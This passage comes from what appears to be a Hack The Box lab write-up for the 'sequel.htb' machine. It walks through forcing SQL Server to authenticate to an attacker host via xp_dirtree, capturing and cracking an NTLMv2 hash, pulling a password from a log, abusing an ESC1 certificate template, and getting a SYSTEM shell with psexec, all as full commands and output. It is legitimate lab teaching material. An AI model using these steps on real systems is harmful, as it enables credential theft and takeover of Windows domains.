class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">mssqlclient.py <span class="s2">&#34;DC&#34;</span>/<span class="s2">&#34;PublicUser&#34;</span>:<span class="s2">&#34;GuestUserCantWrite1&#34;</span>@<span class="s2">&#34;10.10.11.202&#34;</span> </span></span><span class="line"><span class="cl">Impacket v0.13.0.dev0+20250107.155526.3d734075 - Copyright Fortra, LLC and its affiliated companies </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Encryption required, switching to TLS </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> ENVCHANGE<span class="o">(</span>DATABASE<span class="o">)</span>: Old Value: master, New Value: master </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> ENVCHANGE<span class="o">(</span>LANGUAGE<span class="o">)</span>: Old Value: , New Value: us_english </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> ENVCHANGE<span class="o">(</span>PACKETSIZE<span class="o">)</span>: Old Value: 4096, New Value: <span class="m">16192</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> INFO<span class="o">(</span>DC<span class="se">\S</span>QLMOCK<span class="o">)</span>: Line 1: Changed database context to <span class="s1">&#39;master&#39;</span>. </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> INFO<span class="o">(</span>DC<span class="se">\S</span>QLMOCK<span class="o">)</span>: Line 1: Changed language setting to us_english. </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> ACK: Result: <span class="m">1</span> - Microsoft SQL Server <span class="o">(</span><span class="m">150</span> 7208<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> Press <span class="nb">help</span> <span class="k">for</span> extra shell commands </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">SQL <span class="o">(</span>PublicUser guest@master<span class="o">)</span>&gt; xp_dirtree <span class="se">\\</span>10.10.14.10<span class="se">\f</span>ake<span class="se">\f</span>ile </span></span><span class="line"><span class="cl">subdirectory depth file </span></span><span class="line"><span class="cl">------------ ----- ---- </span></span></code></pre></td></tr></table> </div> </div><p>Ici, on observe la reception du hachage du mot de passe de l&rsquo;utilisateur <code>sql_svc</code>.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ responder -I tun0 -w -F </span></span><span class="line"><span class="cl"> __ </span></span><span class="line"><span class="cl"> .----.-----.-----.-----.-----.-----.--<span class="p">|</span> <span class="p">|</span>.-----.----. </span></span><span class="line"><span class="cl"> <span class="p">|</span> _<span class="p">|</span> -__<span class="p">|</span>__ --<span class="p">|</span> _ <span class="p">|</span> _ <span class="p">|</span> <span class="p">|</span> _ <span class="o">||</span> -__<span class="p">|</span> _<span class="p">|</span> </span></span><span class="line"><span class="cl"> <span class="p">|</span>__<span class="p">|</span> <span class="p">|</span>_____<span class="p">|</span>_____<span class="p">|</span> __<span class="p">|</span>_____<span class="p">|</span>__<span class="p">|</span>__<span class="p">|</span>_____<span class="o">||</span>_____<span class="p">|</span>__<span class="p">|</span> </span></span><span class="line"><span class="cl"> <span class="p">|</span>__<span class="p">|</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> NBT-NS, LLMNR <span class="p">&amp;</span> MDNS Responder 3.1.5.0 </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Listening <span class="k">for</span> events... </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> Error starting TCP server on port 53, check permissions or other servers running. </span></span><span class="line"><span class="cl"><span class="o">[</span>SMB<span class="o">]</span> NTLMv2-SSP Client : 10.10.11.202 </span></span><span class="line"><span class="cl"><span class="o">[</span>SMB<span class="o">]</span> NTLMv2-SSP Username : sequel<span class="se">\s</span>ql_svc </span></span><span class="line"><span class="cl"><span class="o">[</span>SMB<span class="o">]</span> NTLMv2-SSP Hash : sql_svc::sequel:1122334455667788:0ED55C287EF37F6AD239ED0D6FE449A0:010100000000000000B9CE454A23DC018C349009419598CF000000000200080044004C005200500001001E00570049004E002D005A004A00320059004300360033004D0035003400480004003400570049004E002D005A004A00320059004300360033004D003500340048002E0044004C00520050002E004C004F00430041004C000300140044004C00520050002E004C004F00430041004C000500140044004C00520050002E004C004F00430041004C000700080000B9CE454A23DC0106000400020000000800300030000000000000000000000000300000051C4546D071DE4532ED8EA78B4BE4B4FB7296E7379A3F3F9319A487E526B2A10A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00310030000000000000000000 </span></span></code></pre></td></tr></table> </div> </div><h3 id="hashcat--sql_svc-password">Hashcat : sql_svc password </h3><p>On trouve le mot de passe de <strong>sql_svc</strong> à l&rsquo;aide de hashcat et la liste rockyou.txt.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ hashcat -m <span class="m">5600</span> ./hash.txt ~/wordlists/rockyou.txt --show </span></span><span class="line"><span class="cl">SQL_SVC::sequel:112233.....0000000:REGGIE1234ronnie </span></span></code></pre></td></tr></table> </div> </div><h3 id="errorlogbak--ryancooper-password">ERRORLOG.BAK : Ryan.Cooper password </h3><p>On peut alors se connecter au compte sql_svc avec evilwinrm et obtenir un powershell sur la machine :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ evil-winrm -u <span class="s1">&#39;sql_svc&#39;</span> -p <span class="s1">&#39;REGGIE1234ronnie&#39;</span> -i <span class="s2">&#34;10.10.11.202&#34;</span> </span></span><span class="line"><span class="cl">... </span></span></code></pre></td></tr></table> </div> </div><p>On trouve le mot de passe de <strong>Ryan.cooper</strong> dans un fichier de logs de SQL Server : <code>NuclearMosquito3</code></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\S</span>QLServer<span class="se">\L</span>ogs&gt; ls </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> Directory: C:<span class="se">\S</span>QLServer<span class="se">\L</span>ogs </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Mode LastWriteTime Length Name </span></span><span class="line"><span class="cl">---- ------------- ------ ---- </span></span><span class="line"><span class="cl">-a---- 2/7/2023 8:06 AM <span class="m">27608</span> ERRORLOG.BAK </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\S</span>QLServer<span class="se">\L</span>ogs&gt; download <span class="s2">&#34;C:/SQLServer/Logs/ERRORLOG.BAK&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Warning: Remember that in docker environment all <span class="nb">local</span> paths should be at /data and it must be mapped correctly as a volume on docker run <span class="nb">command</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Info: Downloading C:/SQLServer/Logs/ERRORLOG.BAK to ERRORLOG.BAK </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">---------------------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ cat ERRORLOG.BAK <span class="p">|</span> grep -i pass </span></span><span class="line"><span class="cl">2022-11-18 13:43:06.75 spid18s Password policy update was successful. </span></span><span class="line"><span class="cl">2022-11-18 13:43:07.44 Logon Logon failed <span class="k">for</span> user <span class="s1">&#39;sequel.htb\Ryan.Cooper&#39;</span>. Reason: Password did not match that <span class="k">for</span> the login provided. <span class="o">[</span>CLIENT: 127.0.0.1<span class="o">]</span> </span></span><span class="line"><span class="cl">2022-11-18 13:43:07.48 Logon Logon failed <span class="k">for</span> user <span class="s1">&#39;NuclearMosquito3&#39;</span>. Reason: Password did not match that <span class="k">for</span> the login provided. <span class="o">[</span>CLIENT: 127.0.0.1<span class="o">]</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ evil-winrm -u <span class="s1">&#39;Ryan.Cooper&#39;</span> -p <span class="s1">&#39;NuclearMosquito3&#39;</span> -i <span class="s2">&#34;10.10.11.202&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Evil-WinRM shell v3.7 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Info: Establishing connection to remote endpoint </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\R</span>yan.Cooper<span class="se">\D</span>ocuments&gt; <span class="nb">type</span> <span class="s2">&#34;C:/Users/Ryan.Cooper/Desktop/user.txt&#34;</span> </span></span><span class="line"><span class="cl">d3b6.....cd0e </span></span></code></pre></td></tr></table> </div> </div><h2 id="privilege-escalation--esc1-template">Privilege Escalation : ESC1 Template </h2><p>When a certificate template allows to specify a subjectAltName, it is possible to request a certificate for another user. It can be used for privileges escalation if the EKU specifies Client Authentication or ANY.</p> <h3 id="enumeration--certipy-find">Enumeration : certipy find </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span><span class="lnt">58 </span><span class="lnt">59 </span><span class="lnt">60 </span><span class="lnt">61 </span><span class="lnt">62 </span><span class="lnt">63 </span><span class="lnt">64 </span><span class="lnt">65 </span><span class="lnt">66 </span><span class="lnt">67 </span><span class="lnt">68 </span><span class="lnt">69 </span><span class="lnt">70 </span><span class="lnt">71 </span><span class="lnt">72 </span><span class="lnt">73 </span><span class="lnt">74 </span><span class="lnt">75 </span><span class="lnt">76 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ certipy find -u <span class="s1">&#39;Ryan.cooper&#39;</span> -p <span class="s1">&#39;NuclearMosquito3&#39;</span> -dc-ip 10.10.11.202 -vulnerable -stdout </span></span><span class="line"><span class="cl">Certipy v4.8.2 - by Oliver Lyak <span class="o">(</span>ly4k<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Finding certificate templates </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Found <span class="m">34</span> certificate templates </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Finding certificate authorities </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Found <span class="m">1</span> certificate authority </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Found <span class="m">12</span> enabled certificate templates </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Trying to get CA configuration <span class="k">for</span> <span class="s1">&#39;sequel-DC-CA&#39;</span> via CSRA </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> Got error <span class="k">while</span> trying to get CA configuration <span class="k">for</span> <span class="s1">&#39;sequel-DC-CA&#39;</span> via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error. </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Trying to get CA configuration <span class="k">for</span> <span class="s1">&#39;sequel-DC-CA&#39;</span> via RRP </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Got CA configuration <span class="k">for</span> <span class="s1">&#39;sequel-DC-CA&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Enumeration output: </span></span><span class="line"><span class="cl">Certificate Authorities </span></span><span class="line"><span class="cl"> <span class="m">0</span> </span></span><span class="line"><span class="cl"> CA Name : sequel-DC-CA </span></span><span class="line"><span class="cl"> DNS Name : dc.sequel.htb </span></span><span class="line"><span class="cl"> Certificate Subject : <span class="nv">CN</span><span class="o">=</span>sequel-DC-CA, <span class="nv">DC</span><span class="o">=</span>sequel, <span class="nv">DC</span><span class="o">=</span>htb </span></span><span class="line"><span class="cl"> Certificate Serial Number : 1EF2FA9A7E6EADAD4F5382F4CE283101 </span></span><span class="line"><span class="cl"> Certificate Validity Start : 2022-11-18 20:58:46+00:00 </span></span><span class="line"><span class="cl"> Certificate Validity End : 2121-11-18 21:08:46+00:00 </span></span><span class="line"><span class="cl"> Web Enrollment : Disabled </span></span><span class="line"><span class="cl"> User Specified SAN : Disabled </span></span><span class="line"><span class="cl"> Request Disposition : Issue </span></span><span class="line"><span class="cl"> Enforce Encryption <span class="k">for</span> Requests : Enabled </span></span><span class="line"><span class="cl"> Permissions </span></span><span class="line"><span class="cl"> Owner : SEQUEL.HTB<span class="se">\A</span>dministrators </span></span><span class="line"><span class="cl"> Access Rights </span></span><span class="line"><span class="cl"> ManageCertificates : SEQUEL.HTB<span class="se">\A</span>dministrators </span></span><span class="line"><span class="cl"> SEQUEL.HTB<span class="se">\D</span>omain Admins </span></span><span class="line"><span class="cl"> SEQUEL.HTB<span class="se">\E</span>nterprise Admins </span></span><span class="line"><span class="cl"> ManageCa : SEQUEL.HTB<span class="se">\A</span>dministrators </span></span><span class="line"><span class="cl"> SEQUEL.HTB<span class="se">\D</span>omain Admins </span></span><span class="line"><span class="cl"> SEQUEL.HTB<span class="se">\E</span>nterprise Admins </span></span><span class="line"><span class="cl"> Enroll : SEQUEL.HTB<span class="se">\A</span>uthenticated Users </span></span><span class="line"><span class="cl">Certificate Templates </span></span><span class="line"><span class="cl"> <span class="m">0</span> </span></span><span class="line"><span class="cl"> Template Name : UserAuthentication </span></span><span class="line"><span class="cl"> Display Name : UserAuthentication </span></span><span class="line"><span class="cl"> Certificate Authorities : sequel-DC-CA </span></span><span class="line"><span class="cl"> Enabled : True </span></span><span class="line"><span class="cl"> Client Authentication : True </span></span><span class="line"><span class="cl"> Enrollment Agent : False </span></span><span class="line"><span class="cl"> Any Purpose : False </span></span><span class="line"><span class="cl"> Enrollee Supplies Subject : True </span></span><span class="line"><span class="cl"> Certificate Name Flag : EnrolleeSuppliesSubject </span></span><span class="line"><span class="cl"> Enrollment Flag : PublishToDs </span></span><span class="line"><span class="cl"> IncludeSymmetricAlgorithms </span></span><span class="line"><span class="cl"> Private Key Flag : ExportableKey </span></span><span class="line"><span class="cl"> Extended Key Usage : Client Authentication </span></span><span class="line"><span class="cl"> Secure Email </span></span><span class="line"><span class="cl"> Encrypting File System </span></span><span class="line"><span class="cl"> Requires Manager Approval : False </span></span><span class="line"><span class="cl"> Requires Key Archival : False </span></span><span class="line"><span class="cl"> Authorized Signatures Required : <span class="m">0</span> </span></span><span class="line"><span class="cl"> Validity Period : <span class="m">10</span> years </span></span><span class="line"><span class="cl"> Renewal Period : <span class="m">6</span> weeks </span></span><span class="line"><span class="cl"> Minimum RSA Key Length : <span class="m">2048</span> </span></span><span class="line"><span class="cl"> Permissions </span></span><span class="line"><span class="cl"> Enrollment Permissions </span></span><span class="line"><span class="cl"> Enrollment Rights : SEQUEL.HTB<span class="se">\D</span>omain Admins </span></span><span class="line"><span class="cl"> SEQUEL.HTB<span class="se">\D</span>omain Users </span></span><span class="line"><span class="cl"> SEQUEL.HTB<span class="se">\E</span>nterprise Admins </span></span><span class="line"><span class="cl"> Object Control Permissions </span></span><span class="line"><span class="cl"> Owner : SEQUEL.HTB<span class="se">\A</span>dministrator </span></span><span class="line"><span class="cl"> Write Owner Principals : SEQUEL.HTB<span class="se">\D</span>omain Admins </span></span><span class="line"><span class="cl"> SEQUEL.HTB<span class="se">\E</span>nterprise Admins </span></span><span class="line"><span class="cl"> SEQUEL.HTB<span class="se">\A</span>dministrator </span></span><span class="line"><span class="cl"> Write Dacl Principals : SEQUEL.HTB<span class="se">\D</span>omain Admins </span></span><span class="line"><span class="cl"> SEQUEL.HTB<span class="se">\E</span>nterprise Admins </span></span><span class="line"><span class="cl"> SEQUEL.HTB<span class="se">\A</span>dministrator </span></span><span class="line"><span class="cl"> Write Property Principals : SEQUEL.HTB<span class="se">\D</span>omain Admins </span></span><span class="line"><span class="cl"> SEQUEL.HTB<span class="se">\E</span>nterprise Admins </span></span><span class="line"><span class="cl"> SEQUEL.HTB<span class="se">\A</span>dministrator </span></span><span class="line"><span class="cl"> <span class="o">[</span>!<span class="o">]</span> Vulnerabilities </span></span><span class="line"><span class="cl"> ESC1 : <span class="s1">&#39;SEQUEL.HTB\\Domain Users&#39;</span> can enroll, enrollee supplies subject and template allows client authentication </span></span></code></pre></td></tr></table> </div> </div><h3 id="requesting-a-malicious-certificate">Requesting a Malicious Certificate </h3><p>On demande un certificat pour Administrator à travers le template vulnérable :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ certipy req -username <span class="s2">&#34;Ryan.cooper@sequel.htb&#34;</span> -p <span class="s2">&#34;NuclearMosquito3&#34;</span> -target <span class="s1">&#39;dc.sequel.htb&#39;</span> -ca <span class="s2">&#34;sequel-DC-CA&#34;</span> -template <span class="s2">&#34;UserAuthentication&#34;</span> -upn <span class="s2">&#34;Administrator@sequel.htb&#34;</span> -debug </span></span><span class="line"><span class="cl">Certipy v4.8.2 - by Oliver Lyak <span class="o">(</span>ly4k<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Trying to resolve <span class="s1">&#39;dc.sequel.htb&#39;</span> at <span class="s1">&#39;127.0.0.53&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Trying to resolve <span class="s1">&#39;SEQUEL.HTB&#39;</span> at <span class="s1">&#39;127.0.0.53&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Generating RSA key </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Requesting certificate via RPC </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Trying to connect to endpoint: ncacn_np:10.10.11.202<span class="o">[</span><span class="se">\p</span>ipe<span class="se">\c</span>ert<span class="o">]</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Connected to endpoint: ncacn_np:10.10.11.202<span class="o">[</span><span class="se">\p</span>ipe<span class="se">\c</span>ert<span class="o">]</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Successfully requested certificate </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Request ID is <span class="m">17</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Got certificate with UPN <span class="s1">&#39;Administrator@sequel.htb&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Certificate has no object SID </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Saved certificate and private key to <span class="s1">&#39;administrator.pfx&#39;</span> </span></span></code></pre></td></tr></table> </div> </div><p>### Fixing Kerberos Clock Skew (KRB_AP_ERR_SKEW) L’attaque échoue d’abord à cause d’un décalage horaire (KRB_AP_ERR_SKEW).<br> En ajustant l’heure avec faketime et l’heure réelle du DC, le problème est corrigé.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ date </span></span><span class="line"><span class="cl">Fri Sep <span class="m">12</span> 12:03:10 AM CEST <span class="m">2025</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ ntpdate -q 10.10.11.202 </span></span><span class="line"><span class="cl">2025-09-12 08:20:53.85924 <span class="o">(</span>+0200<span class="o">)</span> +28800.935013 +/- 0.010303 10.10.11.202 s1 no-leap </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ certipy auth -pfx administrator.pfx </span></span><span class="line"><span class="cl">Certipy v4.8.2 - by Oliver Lyak <span class="o">(</span>ly4k<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Using principal: administrator@sequel.htb </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Trying to get TGT... </span></span><span class="line"><span class="cl"><span class="o">[</span>-<span class="o">]</span> Got error <span class="k">while</span> trying to request TGT: Kerberos SessionError: KRB_AP_ERR_SKEW<span class="o">(</span>Clock skew too great<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ faketime <span class="s2">&#34;</span><span class="k">$(</span>date +<span class="s1">&#39;%Y-%m-%d&#39;</span><span class="k">)</span><span class="s2"> </span><span class="k">$(</span>net <span class="nb">time</span> -S 10.10.11.202 <span class="p">|</span> awk <span class="s1">&#39;{print $4}&#39;</span><span class="k">)</span><span class="s2">&#34;</span> zsh </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ date </span></span><span class="line"><span class="cl">Fri Sep <span class="m">12</span> 08:03:39 AM CEST <span class="m">2025</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ ntpdate -q 10.10.11.202 </span></span><span class="line"><span class="cl">2025-09-12 08:03:44.141842 <span class="o">(</span>+0200<span class="o">)</span> -0.075273 +/- 0.010154 10.10.11.202 s1 no-leap </span></span></code></pre></td></tr></table> </div> </div><h3 id="getting-a-tgt-as-administrator">Getting a TGT as Administrator </h3><p>Avec le certificat généré, on obtient un <strong>TGT</strong> et le <strong>hash NT</strong> de l’Administrator :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span><span class="lnt">9 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ certipy auth -pfx administrator.pfx </span></span><span class="line"><span class="cl">Certipy v4.8.2 - by Oliver Lyak <span class="o">(</span>ly4k<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Using principal: administrator@sequel.htb </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Trying to get TGT... </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Got TGT </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Saved credential cache to <span class="s1">&#39;administrator.ccache&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Trying to retrieve NT <span class="nb">hash</span> <span class="k">for</span> <span class="s1">&#39;administrator&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Got <span class="nb">hash</span> <span class="k">for</span> <span class="s1">&#39;administrator@sequel.htb&#39;</span>: aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee </span></span></code></pre></td></tr></table> </div> </div><h3 id="gaining-administrator-shell-psexec">Gaining Administrator Shell (psexec) </h3><p>En utilisant le TGT et l&rsquo;outil psexec.py, on obtient un shell en tant que <code>nt authority\system</code> :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ <span class="nb">export</span> <span class="nv">KRB5CCNAME</span><span class="o">=</span><span class="s2">&#34;administrator.ccache&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ psexec.py -k -no-pass sequel.htb/Administrator@dc.sequel.htb </span></span><span class="line"><span class="cl">Impacket v0.13.0.dev0+20250107.155526.3d734075 - Copyright Fortra, LLC and its affiliated companies </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Requesting shares on dc.sequel.htb..... </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Found writable share ADMIN$ </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Uploading file zjPAtFqg.exe </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Opening SVCManager on dc.sequel.htb..... </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Creating service cbfM on dc.sequel.htb..... </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Starting service cbfM..... </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> Press <span class="nb">help</span> <span class="k">for</span> extra shell commands </span></span><span class="line"><span 